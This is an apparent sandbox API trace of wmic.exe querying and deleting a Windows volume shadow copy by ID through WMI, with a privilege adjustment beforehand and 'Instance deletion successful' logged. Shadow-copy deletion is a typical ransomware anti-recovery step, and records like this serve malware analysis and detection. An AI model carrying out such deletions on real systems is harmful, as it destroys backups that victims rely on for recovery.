SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0105.511] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0105.511] malloc (_Size=0x18) returned 0x60cc80 [0105.511] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0105.511] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0105.511] malloc (_Size=0x18) returned 0x60cca0 [0105.511] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0105.511] SysStringLen (param_1="\"") returned 0x1 [0105.511] free (_Block=0x60cc80) [0105.511] free (_Block=0x60cc60) [0105.511] free (_Block=0x60cc40) [0105.511] free (_Block=0x60cc20) [0105.511] free (_Block=0x60cc00) [0105.511] free (_Block=0x60cba0) [0105.511] IWbemServices:GetObject (in: This=0x1c83b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1cf348*=0x0, ppCallResult=0x0 | out: ppObject=0x1cf348*=0x1c90a50, ppCallResult=0x0) returned 0x0 [0105.512] malloc (_Size=0x18) returned 0x60cba0 [0105.513] IWbemClassObject:Get (in: This=0x1c90a50, wszName="Text", lFlags=0, pVal=0x1cf380*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff462ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf380*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3e4aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x36e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0105.513] free (_Block=0x60cba0) [0105.513] SafeArrayGetLBound (in: psa=0x3e4aa0, nDim=0x1, plLbound=0x1cf360 | out: plLbound=0x1cf360) returned 0x0 [0105.513] SafeArrayGetUBound (in: psa=0x3e4aa0, nDim=0x1, plUbound=0x1cf350 | out: plUbound=0x1cf350) returned 0x0 [0105.513] SafeArrayGetElement (in: psa=0x3e4aa0, rgIndices=0x1cf344, pv=0x1cf398 | out: pv=0x1cf398) returned 0x0 [0105.513] malloc (_Size=0x18) returned 0x60cba0 [0105.513] malloc (_Size=0x18) returned 0x60cc00 [0105.513] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0105.513] free (_Block=0x60cba0) [0105.513] IUnknown:Release (This=0x1c90a50) returned 0x0 [0105.513] free (_Block=0x60cca0) [0105.513] ??1CHString@@QEAA@XZ () returned 0x738a501 [0105.513] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.513] free (_Block=0x60cb80) [0105.513] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.513] lstrlenW (lpString="Shadow copy management.") returned 23 [0105.513] malloc (_Size=0x30) returned 0x6085c0 [0105.513] lstrlenW (lpString="Shadow copy management.") returned 23 [0105.513] free (_Block=0x60cc00) [0105.513] IUnknown:Release (This=0x1c904e0) returned 0x0 [0105.513] free (_Block=0x60cbc0) [0105.513] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.513] lstrlenW (lpString="PATH") returned 4 [0105.513] lstrlenW (lpString="where") returned 5 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0105.514] lstrlenW (lpString="WHERE") returned 5 [0105.514] lstrlenW (lpString="where") returned 5 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0105.514] lstrlenW (lpString="/") returned 1 [0105.514] lstrlenW (lpString="ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 43 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0105.514] lstrlenW (lpString="-") returned 1 [0105.514] lstrlenW (lpString="ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 43 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0105.514] lstrlenW (lpString="ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 43 [0105.514] malloc (_Size=0x58) returned 0x60d020 [0105.514] lstrlenW (lpString="ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 43 [0105.514] lstrlenW (lpString="/") returned 1 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0105.514] lstrlenW (lpString="-") returned 1 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] malloc (_Size=0xe) returned 0x60cbc0 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] lstrlenW (lpString="GET") returned 3 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0105.514] lstrlenW (lpString="LIST") returned 4 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0105.514] lstrlenW (lpString="SET") returned 3 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0105.514] lstrlenW (lpString="CREATE") returned 6 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0105.514] lstrlenW (lpString="CALL") returned 4 [0105.514] lstrlenW (lpString="delete") returned 6 [0105.514] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0105.515] lstrlenW (lpString="ASSOC") returned 5 [0105.515] lstrlenW (lpString="delete") returned 6 [0105.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0105.515] lstrlenW (lpString="DELETE") returned 6 [0105.515] lstrlenW (lpString="delete") returned 6 [0105.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0105.515] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.515] malloc (_Size=0x3e) returned 0x60d080 [0105.515] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.515] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0105.515] malloc (_Size=0x18) returned 0x60cc00 [0105.515] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0105.515] lstrlenW (lpString="FROM") returned 4 [0105.515] lstrlenW (lpString="*") returned 1 [0105.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0105.515] malloc (_Size=0x18) returned 0x60cb80 [0105.515] free (_Block=0x60cc00) [0105.515] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0105.515] lstrlenW (lpString="FROM") returned 4 [0105.515] lstrlenW (lpString="from") returned 4 [0105.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0105.515] malloc (_Size=0x18) returned 0x60cc00 [0105.515] free (_Block=0x60cb80) [0105.515] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0105.515] malloc (_Size=0x18) returned 0x60cb80 [0105.515] free (_Block=0x60cc00) [0105.515] free (_Block=0x60d080) [0105.516] free (_Block=0x60cb80) [0105.516] lstrlenW (lpString="SET") returned 3 [0105.516] lstrlenW (lpString="delete") returned 6 [0105.516] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0105.516] lstrlenW (lpString="CREATE") returned 6 [0105.516] lstrlenW (lpString="delete") returned 6 [0105.516] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0105.516] free (_Block=0x60cef0) [0105.516] malloc (_Size=0x8) returned 0x606f20 [0105.516] lstrlenW (lpString="GET") returned 3 [0105.516] lstrlenW (lpString="delete") returned 6 [0105.516] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0105.516] lstrlenW (lpString="LIST") returned 4 [0105.516] lstrlenW (lpString="delete") returned 6 [0105.516] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0105.516] lstrlenW (lpString="ASSOC") returned 5 [0105.516] lstrlenW (lpString="delete") returned 6 [0105.516] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0105.516] WbemLocator:IUnknown:AddRef (This=0x1c71390) returned 0x3 [0105.516] free (_Block=0x1ddfb0) [0105.516] lstrlenW (lpString="") returned 0 [0105.516] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.516] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0105.516] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.516] malloc (_Size=0x14) returned 0x60cb80 [0105.516] lstrlenW (lpString="XDUWTFONO") returned 9 [0105.516] GetCurrentThreadId () returned 0x83c [0105.516] GetCurrentProcess () returned 0xffffffffffffffff [0105.516] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf720 | out: TokenHandle=0x1cf720*=0x27c) returned 1 [0105.516] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf718 | out: TokenInformation=0x0, ReturnLength=0x1cf718) returned 0 [0105.516] malloc (_Size=0x118) returned 0x60d080 [0105.516] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x60d080, TokenInformationLength=0x118, ReturnLength=0x1cf718 | out: TokenInformation=0x60d080, ReturnLength=0x1cf718) returned 1 [0105.517] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x60d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-432494656, Attributes=0x780d), (Luid.LowPart=0x0, Luid.HighPart=6344432, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0105.517] free (_Block=0x60d080) [0105.517] CloseHandle (hObject=0x27c) returned 1 [0105.517] lstrlenW (lpString="GET") returned 3 [0105.517] lstrlenW (lpString="delete") returned 6 [0105.517] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0105.517] lstrlenW (lpString="LIST") returned 4 [0105.517] lstrlenW (lpString="delete") returned 6 [0105.517] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0105.517] lstrlenW (lpString="SET") returned 3 [0105.517] lstrlenW (lpString="delete") returned 6 [0105.517] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0105.517] lstrlenW (lpString="CALL") returned 4 [0105.517] lstrlenW (lpString="delete") returned 6 [0105.517] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0105.517] lstrlenW (lpString="ASSOC") returned 5 [0105.517] lstrlenW (lpString="delete") returned 6 [0105.517] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0105.517] lstrlenW (lpString="CREATE") returned 6 [0105.517] lstrlenW (lpString="delete") returned 6 [0105.517] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0105.517] lstrlenW (lpString="DELETE") returned 6 [0105.517] lstrlenW (lpString="delete") returned 6 [0105.517] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0105.517] malloc (_Size=0x18) returned 0x60cc00 [0105.517] lstrlenA (lpString="") returned 0 [0105.517] malloc (_Size=0x2) returned 0x1ddfb0 [0105.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3f314c, cbMultiByte=-1, lpWideCharStr=0x1ddfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.518] free (_Block=0x1ddfb0) [0105.518] malloc (_Size=0x18) returned 0x60cca0 [0105.518] lstrlenA (lpString="") returned 0 [0105.518] malloc (_Size=0x2) returned 0x1ddfb0 [0105.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3f314c, cbMultiByte=-1, lpWideCharStr=0x1ddfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.518] free (_Block=0x1ddfb0) [0105.518] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.518] malloc (_Size=0x3e) returned 0x60d080 [0105.518] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0105.518] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0105.518] malloc (_Size=0x18) returned 0x60cba0 [0105.518] free (_Block=0x60cca0) [0105.518] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0105.518] lstrlenW (lpString="FROM") returned 4 [0105.518] lstrlenW (lpString="*") returned 1 [0105.518] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0105.518] malloc (_Size=0x18) returned 0x60cca0 [0105.518] free (_Block=0x60cba0) [0105.518] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0105.518] lstrlenW (lpString="FROM") returned 4 [0105.518] lstrlenW (lpString="from") returned 4 [0105.518] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0105.518] malloc (_Size=0x18) returned 0x60cba0 [0105.518] free (_Block=0x60cca0) [0105.518] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0105.519] malloc (_Size=0x18) returned 0x60cca0 [0105.519] free (_Block=0x60cba0) [0105.519] free (_Block=0x60d080) [0105.519] malloc (_Size=0x18) returned 0x60cba0 [0105.519] malloc (_Size=0x18) returned 0x60cc20 [0105.519] malloc (_Size=0x18) returned 0x60cc40 [0105.519] malloc (_Size=0x18) returned 0x60cc60 [0105.519] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0105.519] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0105.519] malloc (_Size=0x18) returned 0x60cc80 [0105.519] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0105.519] SysStringLen (param_1=" WHERE ") returned 0x7 [0105.519] malloc (_Size=0x18) returned 0x60ccc0 [0105.519] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0105.519] SysStringLen (param_1="ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 0x2b [0105.519] free (_Block=0x60cc00) [0105.519] free (_Block=0x60cc80) [0105.519] free (_Block=0x60cc60) [0105.519] free (_Block=0x60cc40) [0105.519] free (_Block=0x60cc20) [0105.519] free (_Block=0x60cba0) [0105.520] ??0CHString@@QEAA@XZ () returned 0x1cf690 [0105.520] GetCurrentThreadId () returned 0x83c [0105.520] malloc (_Size=0x18) returned 0x60cba0 [0105.520] malloc (_Size=0x18) returned 0x60cc20 [0105.520] malloc (_Size=0x18) returned 0x60cc40 [0105.520] malloc (_Size=0x18) returned 0x60cc60 [0105.520] malloc (_Size=0x18) returned 0x60cc80 [0105.520] SysStringLen (param_1="\\\\") returned 0x2 [0105.520] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0105.520] malloc (_Size=0x18) returned 0x60cc00 [0105.520] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0105.520] SysStringLen (param_1="\\") returned 0x1 [0105.520] malloc (_Size=0x18) returned 0x60cce0 [0105.520] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0105.520] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0105.520] free (_Block=0x60cc00) [0105.520] free (_Block=0x60cc80) [0105.520] free (_Block=0x60cc60) [0105.520] free (_Block=0x60cc40) [0105.520] free (_Block=0x60cc20) [0105.521] free (_Block=0x60cba0) [0105.521] malloc (_Size=0x18) returned 0x60cba0 [0105.521] malloc (_Size=0x18) returned 0x60cc20 [0105.521] malloc (_Size=0x18) returned 0x60cc40 [0105.521] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c71390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4629d0 | out: ppNamespace=0xff4629d0*=0x1c83c18) returned 0x0 [0105.525] free (_Block=0x60cc40) [0105.525] free (_Block=0x60cc20) [0105.525] free (_Block=0x60cba0) [0105.525] CoSetProxyBlanket (pProxy=0x1c83c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0105.525] free (_Block=0x60cce0) [0105.525] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0105.525] ??0CHString@@QEAA@XZ () returned 0x1cf5e0 [0105.525] GetCurrentThreadId () returned 0x83c [0105.526] malloc (_Size=0x18) returned 0x60cce0 [0105.526] lstrlenA (lpString="") returned 0 [0105.526] malloc (_Size=0x2) returned 0x1ddfb0 [0105.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3f314c, cbMultiByte=-1, lpWideCharStr=0x1ddfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.526] free (_Block=0x1ddfb0) [0105.526] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 0x50 [0105.526] SysStringLen (param_1="") returned 0x0 [0105.526] free (_Block=0x60cce0) [0105.526] malloc (_Size=0x18) returned 0x60cce0 [0105.526] IWbemServices:ExecQuery (in: This=0x1c83c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'", lFlags=0, pCtx=0x0, ppEnum=0x1cf5e8 | out: ppEnum=0x1cf5e8*=0x1c83d18) returned 0x0 [0105.564] free (_Block=0x60cce0) [0105.564] CoSetProxyBlanket (pProxy=0x1c83d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0105.567] IEnumWbemClassObject:Next (in: This=0x1c83d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf5f0, puReturned=0x1cf600 | out: apObjects=0x1cf5f0*=0x1c83d80, puReturned=0x1cf600*=0x1) returned 0x0 [0105.568] malloc (_Size=0x18) returned 0x60cce0 [0105.568] IWbemClassObject:Get (in: This=0x1c83d80, wszName="__PATH", lFlags=0, pVal=0x1cf610*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf610*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.568] free (_Block=0x60cce0) [0105.568] malloc (_Size=0x800) returned 0x60d080 [0105.568] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x60d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0105.568] FormatMessageW (in: dwFlags=0x2500, lpSource=0x60d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf538, nSize=0x0, Arguments=0x1cf548 | out: lpBuffer="뚐<") returned 0x67 [0105.568] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0105.568] malloc (_Size=0x68) returned 0x60d890 [0105.568] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x60d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0105.568] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff462ab0 [0105.568] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0105.569] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0105.569] free (_Block=0x60d890) [0105.569] free (_Block=0x60d080) [0105.569] LocalFree (hMem=0x3cb690) returned 0x0 [0105.569] IWbemServices:DeleteInstance (in: This=0x1c83c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0106.589] IUnknown:Release (This=0x1c83d80) returned 0x0 [0106.589] malloc (_Size=0x800) returned 0x60d080 [0106.589] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x60d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0106.589] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0106.590] malloc (_Size=0x20) returned 0x60cef0 [0106.590] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x60cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0106.590] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff462ab0 [0106.590] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0106.590] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0106.590] free (_Block=0x60cef0) [0106.590] free (_Block=0x60d080) [0106.590] IEnumWbemClassObject:Next (in: This=0x1c83d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf5f0, puReturned=0x1cf600 | out: apObjects=0x1cf5f0*=0x0, puReturned=0x1cf600*=0x0) returned 0x1 [0106.592] IUnknown:Release (This=0x1c83d18) returned 0x0 [0106.593] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0106.593] free (_Block=0x60cca0) [0106.594] free (_Block=0x60ccc0) [0106.594] GetCurrentThreadId () returned 0x83c [0106.594] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf7c8 [0106.594] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1cf7c8 [0106.594] lstrlenW (lpString="LIST") returned 4 [0106.594] lstrlenW (lpString="delete") returned 6 [0106.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0106.594] lstrlenW (lpString="ASSOC") returned 5 [0106.594] lstrlenW (lpString="delete") returned 6 [0106.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0106.594] lstrlenW (lpString="GET") returned 3 [0106.594] lstrlenW (lpString="delete") returned 6 [0106.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0106.594] ??1CHString@@QEAA@XZ () returned 0x738a501 [0106.594] WbemLocator:IUnknown:Release (This=0x1c83c18) returned 0x0 [0106.595] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0106.595] _kbhit () returned 0x0 [0106.595] free (_Block=0x606f20) [0106.595] free (_Block=0x60cac0) [0106.595] free (_Block=0x60caa0) [0106.596] free (_Block=0x60ca80) [0106.596] free (_Block=0x60ca60) [0106.596] free (_Block=0x6070a0) [0106.596] free (_Block=0x60cb40) [0106.596] free (_Block=0x6085c0) [0106.596] free (_Block=0x60d020) [0106.596] free (_Block=0x60cbc0) [0106.596] free (_Block=0x60cfa0) [0106.596] free (_Block=0x60cae0) [0106.596] free (_Block=0x60cbe0) [0106.596] free (_Block=0x607140) [0106.596] free (_Block=0x606e00) [0106.596] free (_Block=0x60cff0) [0106.596] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0106.596] free 